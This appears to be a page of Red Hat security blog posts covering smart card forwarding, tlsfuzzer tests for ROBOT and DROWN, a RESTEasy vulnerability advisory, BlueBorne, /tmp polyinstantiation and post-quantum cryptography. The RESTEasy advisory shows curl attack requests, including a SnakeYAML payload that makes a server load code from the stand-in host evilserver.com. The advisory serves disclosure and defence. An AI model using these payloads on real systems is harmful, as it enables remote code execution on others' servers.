Latest Posts

  • Smart card forwarding with Fedora

    Authored by: Daiki Ueno

    Smart cards and hardware security modules (HSM) are technologies used to keep private keys secure on devices physically isolated from other devices while allowing access only to an authorized user. That way only the intended user can use that device to authenticate, authorize, or perform other functions that involve the private keys while others are prevented from gaining access. These devices usually come in the form of a USB device or token which is plugged into the local computer.

    In modern "cloud" computing, it is often desirable to use a device such as a smart card on remote servers. For example, one can sign software or documents on a remote server, or use the local smart card to authenticate to Kerberos, among other uses.

    There are various approaches to tackling the problem of using a local smart card on a remote system, at different levels of the smart card application stack. It is possible to forward the USB device holding the smart card, to forward the lower-level PC/SC protocol which some smart cards speak, or to forward the high-level interface used to communicate with smart cards, the PKCS#11 interface. It is also possible to forward one’s OpenPGP keys between systems via GnuPG’s gpg-agent, or one’s SSH keys via ssh-agent. While these are very useful approaches when we are restricted to one particular set of keys or a single application, they fail to provide a generic smart card forwarding mechanism.

    Hence, in Fedora, we followed the approach of forwarding the higher level smart card interface, PKCS#11, as it provides the following advantages:

    • Unlike USB forwarding it does not require administrator access on the remote system, nor any special interaction with the remote system’s kernel.
    • It can be used to forward more than just smart cards; for example, a Trusted Platform Module (TPM) chip or any HSM can also be forwarded over the PKCS#11 interface.
    • Unlike application-specific key forwarding mechanisms, it forwards the whole feature set of the card, allowing access to items like X.509 certificates, secret keys, and others.

    In the following sections we describe the approach and tools needed to perform that forwarding over SSH secure communication channels.

    Scenario

    We assume a local workstation and a remote server. On the local workstation we have inserted a smart card (in our examples we will use a Nitrokey card, which works very well with the OpenSC drivers). We will forward the card from the workstation to the remote server and demonstrate various operations with the private key on the card.

    Installing required packages

    Fedora, by default, includes smart card support; the additional components required to forward the card are available as part of the p11-kit-server package, which should be installed on both client and server. For the following examples we will also use some tools from gnutls-utils; these tools can be installed with DNF as follows:

     $ dnf install p11-kit p11-kit-server gnutls-utils libp11
    

    The following sections assume both local and remote computers are running Fedora and the above packages are installed.

    Setting up the PKCS#11 forwarding server on a local client

    To forward a smart card to a remote server, you first need to identify which smart cards are available. To list the smart cards currently attached to the local computer, use the p11tool command from the gnutls-utils package. For example:

     $ p11tool --list-tokens
     ...
     Token 6:
             URL: pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29
             Label: UserPIN (Daiki's token)
             Type: Hardware token
             Manufacturer: www.CardContact.de
             Model: PKCS#15 emulated
             Serial: DENK0000000
             Module: opensc-pkcs11.so
     ...
    

    This is the entry for the card I’d like to forward to the remote system. The important pieces are the ‘pkcs11:’ URL listed above and the module name. Once we determine which smart card to forward, we expose it over a local Unix domain socket with the following p11-kit server command:

     $ p11-kit server --provider /usr/lib64/pkcs11/opensc-pkcs11.so "pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29"
    

    Here we pass to the server the module location (optional) with the --provider option, as well as the URL of the card. We used the values from the Module and URL lines of the p11tool output above. When the p11-kit server command starts, it will print the address of the PKCS#11 Unix domain socket and the process ID of the server:

    P11_KIT_SERVER_ADDRESS=unix:path=/run/user/12345/p11-kit/pkcs11-12345
    P11_KIT_SERVER_PID=12345
    

    For later use, set the variables output by the tool in your shell (e.g., copy and paste them, or wrap the p11-kit server command above in eval $(p11-kit server ...)).
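
    For example, a minimal way to start the server and capture both variables in one step (a sketch; TOKEN_URL is just an illustrative shell variable holding the token URL taken from the p11tool output above):

     $ TOKEN_URL="pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29"
     $ eval $(p11-kit server --provider /usr/lib64/pkcs11/opensc-pkcs11.so "$TOKEN_URL")
     $ echo $P11_KIT_SERVER_ADDRESS
     unix:path=/run/user/12345/p11-kit/pkcs11-12345
    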

    Forwarding and using the PKCS#11 Unix socket on the remote server

    On the remote server, we will first forward the previously created PKCS#11 Unix socket, and then access the smart card through it. To access the forwarded socket as if it were a smart card, a dedicated PKCS#11 module, p11-kit-client.so, is provided as part of the p11-kit-server package.

    Preparing the remote system for PKCS#11 socket forwarding

    One important detail to be aware of is the file system location of the forwarded socket. By convention, the p11-kit-client.so module utilizes the "user runtime directory" managed by systemd: the directory is created when a user logs in and removed upon logout, so the user doesn't need to manually clean up the socket file.

    To locate your user runtime directory, do:

     $ systemd-path user-runtime
     /run/user/1000
    

    The p11-kit-client.so module looks for the socket file under a subdirectory (/run/user/1000/p11-kit in this example). To enable auto-creation of the directory, do:

     $ systemctl --user enable p11-kit-client.service
    

    Forwarding the PKCS#11 socket

    We will use ssh to forward the local PKCS#11 unix socket to the remote server. Following the p11-kit-client convention, we will forward the socket to the remote user run-time path so that cleaning up on disconnect is not required. The remote location of the run-time path can be obtained as follows:

    $ ssh <user>@<remotehost> systemd-path user-runtime
    /run/user/1000
    

    The number at the end of the path above is your user ID in that system (and thus will vary from user to user). You can now forward the Unix domain socket with the -R option of the ssh command (after replacing the example path with the actual run-time path):

     $ ssh -R /run/user/<userID>/p11-kit/pkcs11:${P11_KIT_SERVER_ADDRESS#*=} <user>@<remotehost>
    

    After successfully logging in to the remote host, you can use the forwarded smart card as if it were directly connected to the server. Note that if any error occurs in setting up the forwarding, you will see something like this on your terminal:

    Warning: remote port forwarding failed for listen path /run/user/...
    

    Using the forwarded PKCS#11 socket

    Let’s first make sure it works by listing the forwarded smart card:

     $ ls -l /run/user/1000/p11-kit/pkcs11
     $ p11tool --provider /usr/lib64/pkcs11/p11-kit-client.so --list-tokens
     ...
     Token 0:
             URL: pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29
             Label: UserPIN (Daiki's token)
             Type: Hardware token
             Manufacturer: www.CardContact.de
             Model: PKCS#15 emulated
             Serial: DENK0000000
             Module: (null)
     ...
    

    We can similarly generate or copy objects and certificates to the card using the same tool. Any application which supports PKCS#11 can perform cryptographic operations through the client module.
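
    For instance, a certificate could be copied onto the card through the forwarded socket roughly as follows (a sketch; cert.pem and the test-cert label are placeholders, and the card's user PIN will be requested because of --login):

     $ p11tool --provider /usr/lib64/pkcs11/p11-kit-client.so --login --write \
               --load-certificate cert.pem --label "test-cert" "pkcs11:token=UserPIN%20%28Daiki%27s%20token%29"
    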

    Registering the client module for use with OpenSSL and GnuTLS apps

    To utilize the p11-kit-client module with OpenSSL (via engine_pkcs11, provided by the libp11 package) and GnuTLS applications in Fedora, you have to register it with p11-kit. To do this for the current user, use the following commands:

    $ mkdir -p .config/pkcs11/modules/
    $ echo "module: /usr/lib64/pkcs11/p11-kit-client.so" > .config/pkcs11/modules/p11-kit-client.module
    

    Once this is done both OpenSSL and GnuTLS applications should work, for example:

    $ URL="pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29"
    
    # Generate a key using gnutls' p11tool
    $ p11tool --generate-ecc --login --label test-key "$URL"
    
    # Generate a certificate request with the previous key using openssl
    $ openssl req -engine pkcs11 -new -key "$URL;object=test-key;type=private;pin-value=XXXX" \
             -keyform engine -out req.pem -text -subj "/CN=Test user"
    

    Note that the token URL remains the same in the forwarded system as in the original one.

    Using the client module with OpenSSH

    To re-use the already forwarded smart card for authentication with another remote host, you can run ssh and provide the -I option with p11-kit-client.so. For example:

     $ ssh -I /usr/lib64/pkcs11/p11-kit-client.so <user>@<anotherhost>
    

    Using the forwarded socket with NSS applications

    To register the forwarded smart card in NSS applications, you can set it up with the modutil command:

     $ sudo modutil -dbdir /etc/pki/nssdb -add p11-kit-client -libfile /usr/lib64/pkcs11/p11-kit-client.so
     $ modutil -dbdir /etc/pki/nssdb -list
     ...
       3. p11-kit-client
         library name: /usr/lib64/pkcs11/p11-kit-client.so
            uri: pkcs11:library-manufacturer=OpenSC%20Project;library-description=OpenSC%20smartcard%20framework;library-version=0.17
          slots: 1 slot attached
         status: loaded
    
          slot: Nitrokey Nitrokey HSM (010000000000000000000000) 00 00
         token: UserPIN (Daiki's token)
           uri: pkcs11:token=UserPIN%20(Daiki's%20token);manufacturer=www.CardContact.de;serial=DENK0000000;model=PKCS%2315%20emulated
    

    Conclusion

    With the smart card forwarding described above, it is easy to forward your smart card, or any device accessible through PKCS#11, to the “cloud”. The forwarded device can then be used by OpenSSL, GnuTLS, and NSS applications as if it were a local card, enabling a variety of applications which were not previously possible.

    Posted: 2018-01-16T14:30:00+00:00
  • Detecting ROBOT and other vulnerabilities using Red Hat testing tools

    Authored by: Hubert Kario

    The TLS (Transport Layer Security) protocol, also known as SSL, underpins the security of most Internet protocols. The correctness of its implementations is therefore critical to the safety of communication across network connections.

    To verify the correctness of the TLS implementations we ship, the Red Hat Crypto Team has created a TLS testing framework, developed as the open source tlsfuzzer project. That testing framework is used to detect and fix issues in OpenSSL, NSS, GnuTLS, and other TLS software we ship.

    Recently, Hanno Böck, Juraj Somorovsky, and Craig Young, who discovered the ROBOT vulnerability, identified tlsfuzzer as one of only two tools able to detect the vulnerability at the time they discovered it. This article describes how to use tlsfuzzer to test for two common vulnerabilities: DROWN and ROBOT (which is an extension of the well-known Bleichenbacher attack).

    Getting tlsfuzzer

    tlsfuzzer requires three Python libraries:

    six is available in Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7 and can be installed using the following command:

    yum install python-six
    

    In Fedora, both Python 2 and Python 3 are available, so the Python 2 version of six needs to be installed using
    the following command:

    dnf install python2-six
    

    Note: tlsfuzzer and its dependencies are compatible with Python 2.6, Python 2.7, and Python 3, but because Python 2 is the default python on the above mentioned systems, the instructions below will use Python 2 to run it.

    Remaining libraries can be downloaded to a single directory and run from there:

    git clone https://github.com/tomato42/tlsfuzzer.git                             
    cd tlsfuzzer                                                                    
    git clone https://github.com/warner/python-ecdsa .python-ecdsa                  
    ln -s .python-ecdsa/src/ecdsa/ ecdsa                                            
    git clone https://github.com/tomato42/tlslite-ng .tlslite-ng                    
    ln -s .tlslite-ng/tlslite/ tlslite
    

    Running tests

    The tests that can be run live in the scripts/ directory. The test for ROBOT (and Bleichenbacher) is called test-bleichenbacher-workaround.py. The test for DROWN is called test-sslv2-force-cipher.py.

    To run those scripts, it's necessary to provide them with the hostname and port the server is running on. For a server running on host example.com on port 443, the commands are as follows:

    PYTHONPATH=. python scripts/test-sslv2-force-cipher.py -h example.com -p 443
    PYTHONPATH=. python scripts/test-bleichenbacher-workaround.py -h example.com -p 443
    

    If the test finishes with a summary like this:

    Test end
    successful: 21
    failed: 0
    

    If it does, the server passed the tests (it behaves in a standards-compliant way) and is likely not vulnerable.

    Note: The server can be vulnerable to the Bleichenbacher attack even if it passes the test, as the attack can use the timing of the responses, not only their contents or presence. As this script does not measure response times, it cannot detect that covert channel. Passing the test does mean that, even if the server is in fact vulnerable, the attack is much harder to perform.

    Many scripts support additional options that may work around some peculiarities of the server under test. A listing of them can be obtained by running the script with the --help option.
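
    For example, to see the options accepted by the ROBOT test script used above:

    PYTHONPATH=. python scripts/test-bleichenbacher-workaround.py --help
    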

    Interpreting failures

    Unfortunately, as the tool is primarily aimed at developers, interpreting the errors requires a bit of Python knowledge and an understanding of TLS. Below is a description of the most common harmless errors that can happen during execution of the script.

    Tests in general verify that the server under test is RFC-compliant (that it follows standards like RFC 5246). As the standards are continuously updated to work around or mitigate known vulnerabilities, standards compliance is a good indicator of the overall robustness of an implementation. Fortunately, not all departures from behaviour prescribed in the RFCs are vulnerabilities. Non-compliance does, however, make testing such implementations harder and more of a guessing game.

    That being said, some errors in test execution may be a result of unexpected server configuration rather than a mismatch between the expectations of tlsfuzzer and the server. Read below for how to work around them.

    Note: A failure reported by a script is an indicator of the server not following the expected behaviour, not of a failure to communicate. Similarly, a successful test is a test in which the server behaved as expected; it does not indicate a successful connection.

    General error

    When execution of a script encounters an error, it will print a message like this:

    zero byte in first byte of random padding ...
    Error encountered while processing node <tlsfuzzer.expect.ExpectAlert object at 0x7f96e7e56a90> (child: <tlsfuzzer.expect.ExpectClose object at 0x7f96e7e56ad0>) with last message being: <tlslite.messages.Message object at 0x7f96e79f4090>
    Error while processing
    Traceback (most recent call last):
      File "scripts/test-bleichenbacher-workaround.py", line 250, in main
        runner.run()
      File "/root/tlsfuzzer/tlsfuzzer/runner.py", line 178, in run
        node.process(self.state, msg)
      File "/root/tlsfuzzer/tlsfuzzer/expect.py", line 571, in process
        raise AssertionError(problem_desc)
    AssertionError: Expected alert description "bad_record_mac" does not match received "handshake_failure"
    

    The first line indicates the name of the scenario that was run; it can be used to reproduce that run alone (by passing it as the last parameter to the script, like this: ...workaround.py -h example.com -p 443 "zero byte in first byte of random padding").

    The second line indicates at which point in execution the failure happened, in this case during ExpectAlert.

    The last line indicates the kind of error condition that was detected; in this case the description of the received alert message didn't match the expected one.
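
    Written out in full, using the script and host from the earlier examples, that reproduction command would be:

    PYTHONPATH=. python scripts/test-bleichenbacher-workaround.py -h example.com -p 443 "zero byte in first byte of random padding"
    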

    Connection refused or timeout in Connect error

    Pattern:

    Error encountered while processing node <tlsfuzzer.messages.Connect ...
    ...
        sock.connect((self.hostname, self.port))
      File "/usr/lib64/python2.7/socket.py", line 228, in meth
        return getattr(self._sock,name)(*args)
    error: [Errno 111] Connection refused
    

    and

    Error encountered while processing node <tlsfuzzer.messages.Connect...
    ...
      File "/usr/lib64/python2.7/socket.py", line 228, in meth
        return getattr(self._sock,name)(*args)
    timeout: timed out
    

    The hostname or the port are incorrect for the server, or some system en route blocks communication with the server.

    Unexpected message - Certificate Request

    Pattern:

    Error encountered while processing node <tlsfuzzer.expect.ExpectServerHelloDone
    ...
    AssertionError: Unexpected message from peer: Handshake(certificate_request)
    

    The server is configured to perform client-certificate-based authentication and the script does not know how to handle it. The server needs to be reconfigured to not request a certificate from the client in order to perform this test.

    Unexpected message - Application Data

    Pattern:

    Error encountered while processing node <tlsfuzzer.expect.ExpectAlert ...
    ...
    AssertionError: Unexpected message from peer: ApplicationData(len=8000)
    

    Note: for most tests the failing node will be ExpectAlert, but in general, the node in question is the one right after ExpectApplicationData in the script.

    In the above-mentioned test scripts, this is not an indication of the ROBOT or DROWN vulnerability, but it may indicate other issues. The USAGE.md document of the tlsfuzzer project includes more information about interpreting this and other failures.

    Posted: 2017-12-12T13:56:54+00:00
  • Security is from Mars, Developers are from Venus…or ARE they?

    Authored by: Christopher Robinson

    It is a tale as old as time. Developers and security personnel view each other with suspicion. The perception is that a vast gulf of understanding and ability lies between the two camps. “They can’t possibly understand what it is to do my job!” is a surprisingly common statement tossed about. Both groups blame the other for being the source of all of their ills. It is well known that fixing security bugs early in the development lifecycle not only helps eliminate exposure to potential vulnerabilities, but also saves time, effort, and money. Once a defect escapes into production it can be very costly to remediate.

    Years of siloing and specialization have driven deep wedges between these two critical groups. Both teams have the same goal: to enable the business. They just take slightly different paths to get there and have different expertise and focus. In the last few decades we’ve all been forced to work more closely together, with movements like Agile reminding everyone that we’re all ultimately there to serve the business and the best interest of our customers. Today, with the overwhelming drive to move to a DevOps model, to get features and functionality out into the hands of our customers faster, we must work better together to make the whole organization succeed.

    Through this DevOps shift in mindset (Development and Operations working more closely on building, deploying, and maintaining software), both groups have influenced each other’s thinking. Security has started to embrace the benefits of things like iterative releases and continuous deployments, while our coder-counterparts have expanded their test-driven development methods to include more automation of security test cases and have become more mindful of things like the OWASP Top 10 (the Open Web Application Security Project). We are truly on the brink of a DevSecOps arena where we can have fruitful collaboration from the groups that are behind the engine that drives our respective companies. Those that can embrace this exciting new world are poised to reap the benefits.

    Red Hat Product Security is pleased to partner with our friends over in the Red Hat Developer Program. Our peers there are driving innovation in the open source development communities and bringing open source to a new generation of software engineers. It is breathtaking to see the collaboration and ideas that are emerging in this space. We’re also equally pleased that security is not just an afterthought for them. Developing and composing software that considers “security by design” from the earliest stages of the development lifecycle helps projects move faster while delivering innovative and secure solutions. They have recently kicked off a new site topic that focuses on secure programming and we expect it to be a great resource within the development community: Secure Programming at the Red Hat Developer Program.

    In this dedicated space of our developer portal you’ll find a wealth of resources to help coders code with security in mind. You’ll find blogs from noted luminaries. You’ll find defensive coding guides, and other technical materials that will explain how to avoid common coding flaws that could develop into future software vulnerabilities. You’ll also be able to directly engage with Red Hat Developers and other open source communities. This is a great time to establish that partnership and “reach across the aisle” to each other. So whether you are interested in being a better software engineer and writing more secure code, or are looking to advocate for these techniques, Red Hat has a fantastic set of resources to help guide you toward a more secure future!

    Posted: 2017-11-16T15:00:00+00:00
  • Abuse of RESTEasy Default Providers in JBoss EAP

    Authored by: Jason Shepherd

    Red Hat JBoss Enterprise Application Platform (EAP) is a commonly used host for RESTful webservices. A powerful but potentially dangerous feature of RESTful webservices on JBoss EAP is the ability to accept any media type. If not configured to accept only a specific media type, JBoss EAP will dynamically process a request with the default provider matching the Content-Type HTTP header which the client specifies. Some of the default providers were found to have vulnerabilities which have now been removed from JBoss EAP and its upstream RESTful webservice project, RESTEasy.

    The attack vector

    There are two important vulnerabilities fixed in the RESTEasy project in 2016 which utilized default providers as an attack vector. CVE-2016-7050 was fixed in version 3.0.15.Final, while CVE-2016-9606 was fixed in version 3.0.22.Final. Both vulnerabilities took advantage of the default providers available in RESTEasy. They relied on a webservice endpoint doing one of the following:

    • @Consumes annotation was present specifying wildcard mediaType {*/*}
    • @Consumes annotation was not present on webservice endpoint
    • Webservice endpoint consumes a multipart mediaType

    Here's an example of what a vulnerable webservice would look like:

    import java.util.*;
    import javax.ws.rs.*;
    import javax.ws.rs.core.*;
    
    @Path("/")
    public class PoC_resource {
    
            @POST
            @Path("/concat")
            public Map<String, String> doConcat(Pair pair) {
                    HashMap<String, String> result = new HashMap<String, String>();
                    result.put("Result", pair.getP1() + pair.getP2());
                    return result;
            }
    
    }
    

    Notice how there is no @Consumes annotation on the doConcat method.

    The vulnerabilities

    CVE-2016-7050 took advantage of the deserialization capabilities of SerializableProvider. It was fixed upstream1 before Product Security became aware of it. Luckily, the RESTEasy version used in the supported version of JBoss EAP 7 was later than 3.0.15.Final, so it was not affected. It was reported to Red Hat by Mikhail Egorov of Odin.

    If a RESTful webservice endpoint wasn't configured with a @Consumes annotation, an attacker could utilize the SerializableProvider by sending an HTTP request with a Content-Type of application/x-java-serialized-object. The body of that request would be processed by the SerializableProvider and could contain a malicious payload generated with ysoserial2 or similar. Remote code execution on the server could occur as long as there was a gadget chain on the classpath of the web service application.

    Here's an example:

    curl -v -X POST http://localhost:8080/example/concat -H 'Content-Type: application/x-java-serialized-object' -H 'Expect:' --data-binary '@payload.ser'
    

    CVE-2016-9606 also exploited the default providers of RESTEasy. This time it was the YamlProvider which was the target of abuse. This vulnerability was easier to exploit because it didn't require the application to have a gadget chain library on the classpath. Instead, the SnakeYAML library shipped with RESTEasy was exploited directly to allow remote code execution. This issue was reported to Red Hat Product Security by Moritz Bechler of AgNO3 GmbH & Co. KG.

    SnakeYAML allows loading classes with a URLClassLoader, using its ScriptEngineManager feature. With this feature, a malicious actor could host malicious Java code on their own web server and trick the webservice into loading and executing that Java code.

    An example of a malicious request is as follows:

    curl -X POST --data-binary '!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evilserver.com/"]]]]' -H "Content-Type: text/x-yaml" -v http://localhost:8080/example/concat
    

    Here, evilserver.com is a host controlled by the malicious actor.

    Again, you can see the use of the Content-Type HTTP header, which tricks RESTEasy into using the YamlProvider, even though the developer didn't intend for it to be accessible.

    How to stay safe

    The latest versions of EAP 6.4.x and 7.0.x are not affected by these issues. CVE-2016-9606 did affect EAP 6.4.x; it was fixed in the 6.4.15 release. CVE-2016-9606 was not exploitable on EAP 7.0.x, but it was possible to exploit on 7.1; it is now fixed in the 7.1.0.Beta release. CVE-2016-7050 didn't affect either EAP 6.4.x or 7.0.x.

    If you're using an unpatched release of upstream RESTEasy, be sure to specify the mediaType you're expecting when defining the Restful webservice endpoint. Here's an example of an endpoint that would not be vulnerable:

    import java.util.*;
    import javax.ws.rs.*;
    import javax.ws.rs.core.*;
    
    @Path("/")
    public class PoC_resource {
    
            @POST
            @Path("/concat")
            @Consumes("application/json")
            public Map<String, String> doConcat(Pair pair) {
                    HashMap<String, String> result = new HashMap<String, String>();
                    result.put("Result", pair.getP1() + pair.getP2());
                    return result;
            }
    
    }
    

    Notice this safe version added a @Consumes annotation with a mediaType of application/json.

    This is good practice anyway, because if an HTTP client tries to send a request with a different Content-Type HTTP header, the application will give an appropriate error response, indicating that the Content-Type is not supported.
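
    For example, sending a request with an unsupported media type to the @Consumes-protected endpoint above would be rejected roughly like this (a sketch; the exact status line and response body depend on the JAX-RS implementation and version):

    $ curl -i -X POST http://localhost:8080/example/concat -H 'Content-Type: text/x-yaml' --data-binary 'p1: a'
    HTTP/1.1 415 Unsupported Media Type
    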


    1. https://issues.jboss.org/browse/RESTEASY-1269 

    2. https://github.com/frohoff/ysoserial 

    Posted: 2017-10-18T13:30:00+00:00
  • Kernel Stack Protector and BlueBorne

    Authored by: Red Hat Product...

    Today, a security issue called BlueBorne was disclosed, a vulnerability that could be used to attack sensitive systems via the Bluetooth protocol. Specifically, BlueBorne is a flaw where a remote (but physically quite close) attacker has the potential to get root on a server, without an internet connection or authentication, via installed and active Bluetooth hardware.

    The key phrase is “has the potential.” BlueBorne is still a serious flaw and one that requires patching and remediation, but most Red Hat Enterprise Linux users are at less risk of a direct attack. This is because Bluetooth hardware is not particularly common on servers, and our Server distributions of Red Hat Enterprise Linux don’t enable Bluetooth by default. But what about the desktop and workstation users of Red Hat Enterprise Linux and many other Linux distributions?

    Laptops and desktop machines commonly have Bluetooth hardware, and Workstation variants of Red Hat Enterprise Linux enable Bluetooth by default. It’s possible that a malicious actor could use a remote Bluetooth connection to gain access to personal workstations or terminals in an office building, allowing them to gain root for accessing sensitive data or potentially causing a cascading, system-wide attack. This is unlikely, however, on Linux operating systems, including Red Hat Enterprise Linux, thanks to Stack Protection.

    Stack Protection has been available for some time, having been introduced in some distributions back in 2005. We believe most major vendor distributions build their Linux kernels with Stack Protection enabled. For us, this includes Fedora Core (since version 5) and Red Hat Enterprise Linux (since version 6). With a kernel compiled in this way, the flaw turns from remote code execution into a remote crash (kernel panic). Having a physically local attacker able to crash your machines without touching them is bad, but it’s certainly not as bad as remote root.
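
    You can check whether a given kernel was built with Stack Protection by inspecting its build configuration (a quick check; the exact option name varies between kernel versions, CONFIG_CC_STACKPROTECTOR being the one used in RHEL 7 era kernels):

    $ grep -i stackprotector /boot/config-$(uname -r)
    CONFIG_CC_STACKPROTECTOR=y
    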

    Red Hat, along with other Linux distribution vendors and the upstream Kernel security team, received one week advance notice on BlueBorne in order to prepare patches and updates. We used this time to evaluate the issue, develop the fix and build and test updated packages for supported versions of Red Hat Enterprise Linux. We also used the time to provide clearly understood information about the flaw, and how it impacted our products, which can be found in the Vulnerability Article noted below.

    Because Stack Protection works by adding a single check value (a canary) to the stack before the return address, a buffer overflow could overwrite other buffers on the stack before that canary depending on how things get ordered, so it was important for us to check properly. Based on a technical investigation we concluded that with Stack Protection enabled, it would be quite unlikely to be able to exploit this to gain code execution. We can’t completely rule it out, though, as an attacker may be able to use some other mechanism to bypass it (for example, if they can determine the value of the stack canary, perhaps via a race condition, and combine it with some other flaw).

    On some architectures, notably ppc64 and s390x for Red Hat Enterprise Linux, Stack Protection is not used. However, the Bluetooth kernel module is not available for our s390x Server variant. And ppc64 is only available in a Server variant, which doesn’t install the bluez package, making it not vulnerable by default even if Bluetooth hardware happens to be present.

    So if most distributions build kernels with Stack Protection, and Stack Protection has been available for many years before the flaw was introduced, where is the risk? Well, the problem is going to be all those kernels that have been built without Stack Protection turned on. So things like IoT devices that are Bluetooth enabled along with a vulnerable kernel compiled without Stack Protection will be most at risk from this flaw.

    Regardless of whether you have Stack Protection or not, patch your system. BlueBorne remains an important flaw and one that needs to be remedied as soon as possible via the appropriate updates.

    For Red Hat customers our page https://access.redhat.com/security/vulnerabilities/blueborne contains information on the patches we released today along with other details and mitigations. We’d like to thank Armis Labs for reporting this vulnerability.

    Posted: 2017-09-12T11:51:33+00:00
  • Polyinstantiating /tmp and /var/tmp directories

    Authored by: Huzaifa Sidhpurwala

    On Linux systems, the /tmp/ and /var/tmp/ locations are world-writable. They are used to provide a common location for temporary files and are protected through the sticky bit, so that users cannot remove files they don't own from the directory, even though the directory itself is world-writable. Several daemons/applications use the /tmp or /var/tmp directories to temporarily store data, log information, or to share information between their sub-components. However, due to the shared nature of these directories, several attacks are possible, including symlink attacks and information disclosure through predictable file names.
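
    The sticky bit mentioned above shows up as the trailing t in the directory permissions (illustrative output; dates and link counts will differ):

    $ ls -ld /tmp /var/tmp
    drwxrwxrwt. 22 root root 4096 Aug 31 10:00 /tmp
    drwxrwxrwt.  9 root root 4096 Aug 31 10:00 /var/tmp
    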

    Polyinstantiation of temporary directories is a proactive security measure which reduces chances of attacks that are made possible by /tmp and /var/tmp directories being world-writable.

    Setting Up Polyinstantiated Directories

    Configuring polyinstantiated directories is a three-step process (this example assumes that a Red Hat Enterprise Linux 7 system is used):

    First, create the parent directories which will hold the polyinstantiation child directories. Since in this case we want to set up polyinstantiated /tmp and /var/tmp, we create /tmp-inst and /var/tmp/tmp-inst as the parent directories.

    $ sudo mkdir --mode 000 /tmp-inst
    $ sudo mkdir --mode 000 /var/tmp/tmp-inst
    

    Creating these directories with mode 000 ensures that no users can access them directly. Only polyinstantiated instances mounted on /tmp (or /var/tmp) can be used.

    Second, configure /etc/security/namespace.conf. This file already contains an example configuration which we can use. In our case we will just uncomment the lines corresponding to /tmp and /var/tmp.

     /tmp     /tmp-inst/            level      root,adm 
     /var/tmp /var/tmp/tmp-inst/    level      root,adm
    

    This configuration specifies that /tmp must be polyinstantiated from a subdirectory of /tmp-inst. The third field specifies the method used for polyinstantiation, which in our case is based on the process MLS level. The last field is a comma-separated list of uids or usernames for whom polyinstantiation is not performed1. More information about the configuration parameters can be found in /usr/share/doc/pam-1.1.8/txts/README.pam_namespace.

    Also ensure that pam_namespace is enabled in the PAM login configuration file. This should already be enabled by default on Red Hat Enterprise Linux systems.

     session    required    pam_namespace.so
    

    Third, set up the correct SELinux context. This is a two-step process. In the first step we need to enable the global SELinux boolean for polyinstantiation using the following command:

    $ sudo setsebool polyinstantiation_enabled=1
    

    You can verify it worked by using:

    $ sudo getsebool polyinstantiation_enabled
    polyinstantiation_enabled --> on
    

    In the second step, we need to set the SELinux context of the polyinstantiated parent directories using the following commands:

    $ sudo chcon --reference=/tmp /tmp-inst
    $ sudo chcon --reference=/var/tmp/ /var/tmp/tmp-inst
    

    The above commands use the SELinux contexts of the /tmp and /var/tmp directories, respectively, as references and copy them to our polyinstantiated parent directories.

    Once the above is done, you can log off and log in again, and each non-root user gets their own polyinstantiated /tmp and /var/tmp directories.
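
    A quick way to confirm the setup (a sketch; the file name is just for illustration) is to create a file in /tmp from a fresh non-root login session and note that it is only visible inside that user's instance:

    $ touch /tmp/scratch-file        # inside the user's login session
    $ ls /tmp                        # only this user's files are visible
    scratch-file
    $ sudo ls /tmp-inst              # as root: the per-user instance directories live here
    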

    PrivateTmp feature of systemd

    Daemons running on systems which use systemd can now use the PrivateTmp feature. This gives each daemon a private /tmp directory that is not shared with processes outside its namespace; the trade-off is that sharing data through /tmp with processes outside the namespace becomes impossible. The main difference between a polyinstantiated /tmp and PrivateTmp is that the former creates a per-user /tmp directory, while the latter creates a per-daemon (per-process) /tmp.
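
    For example, a daemon can be opted into this feature with a single directive in its unit file or a drop-in (a sketch; mydaemon.service is a hypothetical unit name, and systemctl daemon-reload plus a service restart are needed afterwards):

    # /etc/systemd/system/mydaemon.service.d/private-tmp.conf
    [Service]
    # Give this service its own private /tmp and /var/tmp, invisible to other processes
    PrivateTmp=true
    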

    Conclusion

    In conclusion, while polyinstantiation will not prevent every type of attack (such as those caused by flaws in the applications running on the system, or misconfigurations like a weak root password or wrong directory/file permissions), it is a useful addition to your security toolkit that is straightforward to configure. Polyinstantiation can also be used for other directories such as /home. Some time ago, polyinstantiated /tmp by default was proposed for Fedora, but several issues caused the proposal to be denied.


    1. Default values include the root and the adm user. Since root is a superuser anyway, it does not make any sense to polyinstantiate the /tmp directory for the root user. 

    Posted: 2017-08-31T17:28:50+00:00
  • Post Quantum Cryptography

    Authored by: Huzaifa Sidhpurwala

    Traditional computers are binary digital electronic devices based on transistors. They store information encoded in the form of binary digits, each of which can be either 0 or 1. Quantum computers, in contrast, use quantum bits or qubits to store information as 0, 1, or even both at the same time. Quantum mechanical phenomena such as entanglement and tunnelling allow these quantum computers to handle a large number of states at the same time.

    Quantum computers are probabilistic rather than deterministic. Large-scale quantum computers would theoretically be able to solve certain problems much quicker than any classical computers that use even the best currently known algorithms. Quantum computers may be able to efficiently solve problems which are not practically feasible to solve on classical computers. Practical quantum computers will have serious implications on existing cryptographic primitives.

    Most cryptographic protocols are made of two main parts: the key negotiation algorithm, which is used to establish a secure channel, and the symmetric or bulk encryption cipher, which is used to do the actual protection of the channel via encryption/decryption between the client and the server.

    The SSL/TLS protocol uses RSA, Diffie-Hellman (DH) or Elliptic Curve Diffie-Hellman (ECDH) primitives for the key exchange algorithm. These primitives are based on hard mathematical problems which are easy to solve when the private key is known, but computationally intensive without it. For example, RSA is based on the fact that, given the product of two large prime numbers (which forms the public key), factorizing that product is computationally intensive. By comparison, a quantum computer could efficiently solve this problem using Shor's algorithm to recover the prime factors. This ability could allow a quantum computer to break many of the cryptographic systems in use today. Similarly, DH and ECDH key exchanges could all be broken very easily using sufficiently large quantum computers.

